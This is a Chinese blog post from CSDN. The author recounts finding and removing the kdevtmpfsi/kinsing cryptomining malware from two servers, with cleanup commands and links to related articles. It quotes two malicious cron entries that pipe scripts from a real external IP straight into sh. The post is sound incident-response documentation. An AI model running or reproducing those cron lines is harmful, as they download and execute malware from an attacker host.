kdevtmpfsi & kinsing 挖矿病毒

最新推荐文章于 2024-06-06 16:11:32 发布
最新推荐文章于 2024-06-06 16:11:32 发布
阅读量1.3k 收藏 1
点赞数
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chizhou52501314/article/details/129328090
版权

在机器上排查问题时,发现了两个异常的定时任务,分别在两台入口机器上

* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

* * * * * wget -q -O - http://185.122.204.197/scg.sh | sh > /dev/null 2>&1

直觉告诉我这不简单,拿IP一查,完犊子了
在这里插入图片描述

入口机器被攻击了,二话不说,赶紧清除定时任务 随后继续查看系统日志,/var/log/messages
在这里插入图片描述

kdevtmpfsi进程网上一查是挖矿病毒,赶紧查看该进程
在这里插入图片描述

一通杀,一通删 处理完,还好进程没起来了,查看定时任务日志(/var/log/cron)
Preview
原来挖矿程序一直在运行着,还好这两台机器的配置不高,外加这个病毒好像是遇到了内存堆栈问题,其实一直没跑起来,对机器的影响不大。

ps -ef | grep kdevtmpfsi | grep -v grep
ll /tmp/kdevtmpfsi 
ps -ef | grep kinsing  | grep -v grep
ll /etc/kinsing
kill -9 16879 15989
rm -rf /tmp/kdevtmpfsi  /etc/kinsing

处理的时候尝试把这两个下下来,但是都被公司的防护软件直接删除了,确认病毒无误

事实证明,互联网多么险恶,千万不要在网上裸奔

皇城之巅风雪依旧
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
记一次杀毒工作--kdevtmpfsi挖矿病毒
Nickkun的博客
12-28 654
起因:redis配置不安全导致 参考文章: https://help.aliyun.com/knowledge_detail/37447.html?spm=a2c4g.11186631.2.2.828c1848kuRv6p 1.漏洞描述 Redis 因配置不当存在未授权访问漏洞,可以被攻击者恶意利用。 在特定条件下,如果 Redis 以 root 身份运行,黑客可以给 root 账号写入 SSH 公钥文件,直接通过 SSH 登录受害服务器,从而获取服务器权限和数据。一旦入侵成功,攻击者可直接添加账号用于 S
xmrig挖矿病毒导致Postgresql数据库掉线
kite99的博客
04-18 1218
xmrig挖矿病毒导致Postgresql数据库断线。清除病毒数据库工作正常。
一次挖矿病毒的排查过程
最新发布
邓邓子的博客
06-06 205
由于重启前后,相关命令如ps、ls等都无法使用,最后重装系统!清除异常任务,重启服务器。
腾讯云服务器遭遇kdevtmpfsi挖矿病毒
sunydayshine的博客
06-02 1137
登录到服务器后开始检查数据库数据,发现并没有被破坏,然后开始清理病毒,先使用top命令看到这个进程,然后将其kill掉,然后再去/etc/文件下找到了异常文件libsystem.so和kinsing,将其删除。一看就是在偷偷下载不怀好意的脚本文件,确定了这个ip不是我们机器,然后果断删除这个定时任务,然后又重复杀掉kdevtmpfsi进程,删除相关文件夹,机器终于恢复了正常。没一会儿的功夫的,监控发现cpu又打满了100%,然后我又开始重复的步骤,杀进程删文件,看来这个病毒并没有这么容易解决。
记一次Linux被入侵,服务器变“矿机”全过程
yeluoxiang的专栏
06-13 4683
“周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云...
Linux CPU占用率99%很高被kdevtmpfsikinsing 挖矿病毒入侵
小蜜蜂
02-23 3527
目录 一:警告 二:查看cup占用 三:解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4:删除掉kdevtmpfsi的相关文件 四.怎么预防处理这个病毒 一:警告 先上阿里云上的报警信息。有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为...
云服务器清理挖矿进程
maoyuanming0806的博客
04-22 1162
清理挖矿程序 问题复现 没有启动什么占用资源的进程,但是4G内存直接快满了,cpu也高,基本可以判断是有挖矿程序在跑 如下情况 [mym@bigdata01 software]$ free -h total used free shared buff/cache available Mem: 3.9G ...
kdevtmpfsi样本.zip
03-16
- **安全软件**:安装并更新反病毒和反恶意软件工具,对系统进行全面扫描。 - **用户教育**:提高用户安全意识,避免点击未知链接或下载不安全的文件。 5. **处理kdevtmpfsi样本** - **隔离分析**:在安全的环境...
云服务器异常测试kdevtmpfsi.rar
12-31
云服务器和kdevtmpfsi测试版和处理方法 CPU 会大于100%
挖矿病毒kdevtmpfsi,kinsing进程隐藏解决
张火火博客
05-31 1813
挖矿病毒kdevtmpfsi,kinsing进程隐藏解决
挖矿病毒 kdevtmpfsi 的处理办法
weixin_42329623的博客
04-02 1560
挖矿病毒 kdevtmpfsi 的查找与处理办法
服务器中挖矿病毒kinsing的临时处理方法
企业数字化转型卫淼全栈技术工作室
06-02 891
ps -aux | grep kinsing病毒名,查找病毒进程,然后杀死进程,如果杀死后,还会生成,那就查计划任务是否也被篡改了,crontab -l命令查看当前登录的用户计划任务,如果有异常的计划任务,那么就使用crontab -r命令删除所有的计划任务,删除ssh无密登录的秘钥(cd ~/.ssh )。一般解决kinsing病毒的方法,是top c 查100%的进程,并获取进程pid,然后使用。服务器中挖矿病毒,非常郁闷,删了还继续,最后使用了两种方式,暂时解决病毒问题。3、服务器漏洞升级、打补丁。
阿里云服务器中挖矿病毒了,名称为 kinsing
qq_40215763的博客
05-06 4246
五一本来就没有过好,上班来了第一天同事就说页面打不开了 不开心的我就打开看看项目页面,不看不要紧一看还真是见鬼了 赶紧查看一下 top查看了一下 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 25638 root 10 -10 25518 ...
再谈shell之“>/dev/null 2>&1”
08-06 446
今天在自己的一个技术群中又被问道了这么一个问题,于是又通俗的解释了一下,做个记录,大家看看解释是否清楚! shell中可能经常能看到:>/dev/null 2>&1 命令的结果可以通过%>的形式来定义输出 分解这个组合:“>/dev/null 2>&1” 为五部分。 1:> 代表重定向到哪里,例如:echo "123" > /home/123.txt 2:/dev/nul
记一次解决kdevtmpfsi挖矿病毒
u010737670的博客
05-10 976
ikdevtmpfsi病毒不断出现的解决历程。。。
kdevtmpfsi木马清除
黑喵警长的博客
04-04 2485
记录一下今天服务器中的木马病毒——kdevtmpfsi 这是一个挖矿病毒,通过我docker的redis进入的,一开始没设置密码的隐患啊。 应该配置好密码,做好端口映射,别傻乎乎的用默认的主机端口~ 先将相应木马文件删除 sudo find / -name kdevtmpfsi* sudo rm -rf ... 再将守护进程的文件删除 sudo find / -name kinsing* sud...
confluence挖矿病毒kdevtmpfsi 、solrd)解决
lin351550660的专栏
01-12 3491
自己安装了conference,没用1周。发现服务器内存被吃完了。 定位问题: 1、之前就听说过confluence 有漏洞 攻击者会利用confluence编辑页面的某个参数进行写入攻击。所以直接在百度搜索:confluence挖矿病毒 2、感谢https://www.cnblogs.com/hack404/p/11464890.html作者的帮助。 处理过程: 1. 先封掉外网HTTP 端口 使用腾讯云控制台 安全组 设置80端口不允许访问。 2. 查杀进程 使用命令:top 查..
如何杀掉kdevtmpfsi挖矿进程
点点滴滴的博客
12-26 8408
1、top 找到挖矿程序进程号 2、systemctl status 进程号 根据上面的进程号找父程序 3、关掉Active变色字体下面的进程(4-5) 4、rm -rf /tmp/kdevtmpfsi 删除掉这个东西 5、kill -9 进程号 ps -ef|grep kinsing查询进程号 6、kill -9 top里面的主挖矿进程号 ...
查杀kdevtmpfsi挖矿病毒
c123m的专栏
06-08 443
1. top找到PID [root@demo ~]# top PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 15843 yarn 20 0 2653576 2.3g 996 S 100.0 15.0 11:23.75 kdevt

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值